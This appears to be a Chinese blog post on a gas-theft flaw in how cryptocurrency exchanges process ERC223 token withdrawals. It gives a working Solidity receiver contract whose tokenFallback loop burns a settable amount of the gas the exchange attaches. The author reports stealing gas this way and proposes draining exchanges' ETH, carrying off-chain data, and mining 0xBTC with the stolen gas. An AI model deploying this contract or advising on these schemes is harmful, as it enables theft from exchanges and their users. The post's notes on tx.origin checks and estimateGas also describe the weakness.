ERC223 是一种基于 ERC20 标准的代币,它与 ERC20 不一样的是,如果转账的 receiver 是合约地址,则会调用合约地址的特定函数。这就好像支付宝和微信支付的通知回调接口一样。
if (isUserAddress == false) {ERC223ContractInterface receiver = ERC223ContractInterface(_to);receiver.tokenFallback(msg.sender, _value, _data);}
当然 ERC 677 和 ERC 777 也有类似的问题,不过他们的钩子不在 transfer 方法中,所以对交易所不会造成影响。
Tx.origin的担忧
因此我们能联想到的是如果在 ERC223 中 msg.sender 发送一笔交易,他如果参与了使用 tx.origin 做验证的缺陷合约(代币、理财)那是不是有安全问题。因此为了规避此类安全问题,通常会要求交易所将该币种与其他币种做业务隔离,单独分配一个地址做此项业务。
Estimate Gas
其次是在完成这一类判断以后,仍要注意的是,钱包是否在转账的时是否 estimateGas ,还是设定为一个固定值。如果 estimateGas 则会有问题,他们可以通过提币的方式来窃取你的gas,做更多额外的事情。
EIP1559
在 EIP1559 以后做了一个重大的更新,交易费分为了基本费(base fee)、小费(priority fee)、最高费用(max fee)。并且如果一笔交易你仅用了部分gas,那么将会退还你的部分费用。
用户退款金额=最高费用-(基本费+小费)
在 EIP1559 以后有部分交易所利用了这一特性,直接在每一笔 transfer 中给出了最高费用,100万。
我实际在交易所中支出的提币手续费仅价值 3U ,但是我却窃取到了价值 40 U的 gas。以下是接收合约的代码,只是不断的在浪费gas,通过此脚本可以测算出哪些交易所在 estimateGas 。哪些交易所在 固定gas ,哪些交易所在 gas不够的情况下会追加gas 重新发送交易。
/***Submitted for verification at Etherscan.io on 2022-06-21*/pragma solidity ^0.8.0;/*** @title Contract that will work with ERC223 tokens.*/abstract contract IERC223Recipient {struct ERC223TransferInfo{address token_contract;address sender;uint256 value;bytes data;}ERC223TransferInfo private tkn;uint256 loopnum;/*** @dev Standard ERC223 function that will handle incoming token transfers.** @param _from Token sender address.* @param _value Amount of tokens.* @param _data Transaction metadata.*/function tokenFallback(address _from, uint _value, bytes memory _data) public virtual{/*** @dev Note that inside of the token transaction handler the actual sender of token transfer is accessible via the tkn.sender variable* (analogue of msg.sender for Ether transfers)** tkn.value - is the amount of transferred tokens* tkn.data - is the "metadata" of token transfer* tkn.token_contract is most likely equal to msg.sender because the token contract typically invokes this function*/tkn.token_contract = msg.sender;tkn.sender = _from;tkn.value = _value;tkn.data = _data;for (uint i = 3; i <= loopnum; i++) {require(i-1 > 1);}// ACTUAL CODE}}contract MyContract is IERC223Recipient {function setnum(uint256 num) public {loopnum = num;}}
窃取gas的用途
漏洞的利用场景很值得思考,如果仅是损人不利己,那么似乎是个鸡肋漏洞。虽然在测试中在我提币失败以后,交易所全额退还了我的交易费。这意味着我们可以利用此漏洞在gas高的时候刷光交易所的ETH余额。
预言机场景
100万gas可以做很多事情,通常完成转账只需要10万gas,剩余的90万可以用来做预言机。当然不能作为价格预言机。
transfer(address _to, uint256 _value)在transfer中 value是可控的,在减去交易所提币手续费后,我们可以用 value 作为一个可控的变量传输数据到区块链链上。
0xBTC
0xBTC是一个链下挖矿,推送ETH链上的Mint的有趣的小币。通常来说一笔 Mint 会在 27w gas左右。如果漏洞利用得当,你将获得比寻常矿工更低的成本。